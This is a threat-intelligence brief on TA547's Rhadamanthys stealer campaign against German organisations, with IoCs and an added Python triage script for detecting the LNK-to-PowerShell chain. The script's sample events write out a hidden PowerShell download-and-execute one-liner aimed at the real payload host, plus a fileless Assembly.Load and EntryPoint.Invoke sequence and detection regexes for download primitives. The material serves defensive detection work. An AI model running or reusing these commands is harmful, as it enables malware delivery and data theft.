Security Brief: TA547 Targets German Organizations with Rhadamanthys Stealer

Proofpoint reported that TA547 targeted German organizations with phishing emails impersonating Metro. The emails delivered a password-protected ZIP (password: MAR26) containing an LNK; opening the LNK launched PowerShell, which fetched a remote script that decoded a Base64-encoded Rhadamanthys stealer and loaded it entirely in memory. The PowerShell used in the campaign included unusually polished, grammatically correct comments consistent with LLM-generated code. #TA547 #Rhadamanthys

Keypoints

  • Proofpoint observed TA547 distributing the Rhadamanthys information stealer, the first time this actor has been seen using that malware.
  • Phishing emails impersonated German retailer Metro and included a password-protected ZIP (password: MAR26) with an LNK file.
  • Executing the LNK caused PowerShell to run a remote script (hosted at hxxps://bolibachan[.]com/g[.]txt) that contained a Base64-encoded Rhadamanthys payload.
  • The PowerShell script decoded the Base64 payload, loaded it as a .NET assembly in memory, and executed the assembly entry point—avoiding disk writes.
  • Deobfuscated PowerShell contained highly specific, grammatically correct comments above components, suggesting use of an LLM to generate or edit the code.
  • Observed C2 infrastructure included domains and an IP: indscpm[.]xyz and 94[.]131[.]104[.]223:443 (first seen 26 Mar 2024).

MITRE Techniques

  • [T1566] Phishing – Actor used targeted emails impersonating Metro to deliver a malicious ZIP attachment (‘Rechnung No:31518562’ and ‘in3 0gc-(94762)_6563.zip’).
  • [T1204.001] User Execution: Malicious File – A user-executed LNK file in the ZIP initiated the attack chain (‘password-protected ZIP file (password: MAR26) containing an LNK file’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – The LNK invoked PowerShell which ran a remote script and executed commands to decode and load the payload (‘triggered PowerShell to run a remote PowerShell script’).
  • [T1140] Deobfuscate/Decode Files or Information – The PowerShell script decoded a Base64-encoded executable stored in a variable before loading it (‘decoded the Base64-encoded Rhadamanthys executable file stored in a variable’).
  • [T1620] Reflective Code Loading – The decoded content was loaded as an assembly into memory and its entry point executed without writing to disk (‘loaded it as an assembly into memory and then executed the entry point of the assembly’).
  • [T1027] Obfuscated Files or Information – The attack used encoding/obfuscation to conceal the payload in variables and embedded Base64 content (‘Base64-encoded Rhadamanthys executable file stored in a variable’).

Indicators of Compromise

  • [URL] PowerShell payload hosting – hxxps://bolibachan[.]com/g[.]txt (PowerShell payload fetched 26 Mar 2024)
  • [Domain] Rhadamanthys C2 – indscpm[.]xyz (Rhadamanthys command-and-control observed 26 Mar 2024)
  • [IP:Port] Rhadamanthys C2 – 94[.]131[.]104[.]223:443 (Rhadamanthys command-and-control observed 26 Mar 2024)
  • [Email sender] Phishing sender address – rechnung.metro.de@metro-delivery[.]com (used to impersonate Metro in phishing emails)
  • [Filename & password] Delivery artifact – in3 0gc-(94762)_6563.zip (contains LNK); password: MAR26

Emails used a password-protected ZIP attachment (password: MAR26) containing an LNK file; executing the LNK launched a PowerShell command that retrieved a remote script hosted at hxxps://bolibachan[.]com/g[.]txt. The remote PowerShell contained Base64-encoded data that it decoded into a Rhadamanthys executable held in memory rather than written to disk.

The decoded payload was loaded as a .NET assembly in memory and its entry point executed, enabling fileless execution and subsequent network communications to command-and-control infrastructure (examples: indscpm[.]xyz and 94[.]131[.]104[.]223:443). The PowerShell used obfuscation/encoding techniques to conceal the payload and the script included unusually specific, grammatically correct comments above code components—characteristics consistent with LLM-generated code.

Indicators to triage include the delivery URL (bolibachan[.]com/g[.]txt), the observed C2 domain and IP, the ZIP/LNK delivery pattern, and the ZIP password (MAR26). Detection should focus on the execution chain rather than any single step: PowerShell spawned from an LNK that fetches a remote script, Base64 decoding in that script, in-memory assembly loading followed by entry-point invocation, and outbound connections to the listed C2 infrastructure. A lone FromBase64String call or web request is common in legitimate administration and is too noisy to alert on by itself; the decode-load-invoke sequence within one process is the discriminating signal. PowerShell script block logging (Event ID 4104) records the decoded script content needed to see that sequence, and process-creation telemetry supplies the explorer.exe-to-PowerShell parent relationship that an LNK launch produces.
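The following is an added example, not Proofpoint's code or anything from the report, that turns the detection guidance above into triage logic: it correlates process-creation, script-block and network events per PID, flags PowerShell spawned by explorer.exe with a download primitive, requires the decode, Assembly.Load and EntryPoint.Invoke stages to appear together before calling it in-memory loading, and matches destinations against the IoCs listed above. The event field names loosely follow Sysmon and PowerShell script block logging, the regexes, reason labels and the SAMPLE_EVENTS telemetry are all constructed assumptions for illustration, and the IoCs are refanged only so they compare against parsed hostnames; nothing is contacted.

```python
"""Triage logic for the TA547 execution chain described in the brief.

Added example, not Proofpoint's code. Event shapes loosely follow Sysmon
process-creation (ID 1) and network (ID 3) events and PowerShell script block
logging (ID 4104); the sample events below are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# IoCs from the brief. The report defangs them; they are refanged here only so
# that hostnames parsed from telemetry compare cleanly. Nothing is contacted.
KNOWN_BAD_HOSTS = {"bolibachan.com", "indscpm.xyz"}
KNOWN_BAD_SOCKETS = {("94.131.104.223", 443)}

# One regex per stage of the chain: remote fetch, Base64 decode,
# Assembly.Load from a byte array, EntryPoint.Invoke. (Assumed patterns.)
STAGE_PATTERNS = {
    "remote_fetch": re.compile(
        r"Net\.WebClient|DownloadString|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "assembly_load": re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\(", re.I),
    "entrypoint_invoke": re.compile(r"\.EntryPoint\.Invoke\(", re.I),
}
# Decode + load + invoke together is the fileless-execution signature; a lone
# FromBase64String or Invoke-WebRequest is far too common to alert on.
STAGES_REQUIRED = {"base64_decode", "assembly_load", "entrypoint_invoke"}


@dataclass
class Event:
    kind: str      # "process", "scriptblock" or "network"
    pid: int
    fields: dict


def lnk_triggered_powershell(f: dict) -> bool:
    """PowerShell spawned by explorer.exe (the parent when a user double-clicks
    an LNK) whose command line carries a download primitive."""
    image = f.get("Image", "").lower()
    parent = f.get("ParentImage", "").lower()
    return (image.endswith(("powershell.exe", "pwsh.exe"))
            and parent.endswith("explorer.exe")
            and STAGE_PATTERNS["remote_fetch"].search(f.get("CommandLine", "")) is not None)


def scriptblock_stages(text: str) -> set:
    """Which stages of the chain appear in one logged script block."""
    return {name for name, pat in STAGE_PATTERNS.items() if pat.search(text)}


def hosts_in_text(text: str) -> set:
    """Hostnames of any http(s) URLs in a command line or script block."""
    return {(urlparse(m.group(0)).hostname or "").lower()
            for m in re.finditer(r"https?://[^\s'\"()]+", text, re.I)}


def c2_match(f: dict):
    """Return a label if a network event hits a listed C2 domain or socket."""
    host = f.get("DestinationHostname", "").lower().rstrip(".")
    sock = (f.get("DestinationIp", ""), int(f.get("DestinationPort", 0)))
    if host in KNOWN_BAD_HOSTS:
        return host
    if sock in KNOWN_BAD_SOCKETS:
        return "%s:%d" % sock
    return None


def triage(events):
    """Correlate events per PID; return {pid: [reasons]} for PIDs to escalate."""
    reasons, stages = {}, {}
    for e in events:
        r = reasons.setdefault(e.pid, [])
        if e.kind == "process" and lnk_triggered_powershell(e.fields):
            r.append("lnk_triggered_powershell")
            for h in sorted(hosts_in_text(e.fields.get("CommandLine", "")) & KNOWN_BAD_HOSTS):
                r.append("payload_host:" + h)
        elif e.kind == "scriptblock":
            s = stages.setdefault(e.pid, set())
            s |= scriptblock_stages(e.fields.get("ScriptBlockText", ""))
            if STAGES_REQUIRED <= s and "in_memory_assembly_load" not in r:
                r.append("in_memory_assembly_load")
        elif e.kind == "network":
            hit = c2_match(e.fields)
            if hit:
                r.append("c2_ioc:" + hit)
    return {pid: r for pid, r in reasons.items() if r}


# Constructed sample telemetry (not from the report): one infected host and
# one benign admin session that uses the same cmdlets without the load chain.
SAMPLE_EVENTS = [
    Event("process", 4120, {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -w hidden -c \"iex (New-Object Net.WebClient)"
                       ".DownloadString('https://bolibachan.com/g.txt')\""}),
    Event("scriptblock", 4120, {"ScriptBlockText":
          "$bytes = [Convert]::FromBase64String($encoded)"}),
    Event("scriptblock", 4120, {"ScriptBlockText":
          "$asm = [System.Reflection.Assembly]::Load($bytes); "
          "$asm.EntryPoint.Invoke($null, $null)"}),
    Event("network", 4120, {"DestinationHostname": "indscpm.xyz",
                            "DestinationIp": "94.131.104.223", "DestinationPort": "443"}),
    Event("process", 5020, {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"}),
    Event("scriptblock", 5020, {"ScriptBlockText":
          "Invoke-WebRequest -Uri https://updates.example.com/manifest.json -OutFile m.json"}),
]

if __name__ == "__main__":
    for pid, why in triage(SAMPLE_EVENTS).items():
        print(pid, why)
```

On the constructed sample, only PID 4120 is escalated, with all four reasons; the admin session on PID 5020 trips the download regex but never reaches the decode-load-invoke set, so it produces no finding. The stage set is accumulated across script blocks because PowerShell logs a long script as several 4104 events, and the assembly-load reason is only emitted once per process.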

Read more: https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta547-targets-german-organizations-rhadamanthys-stealer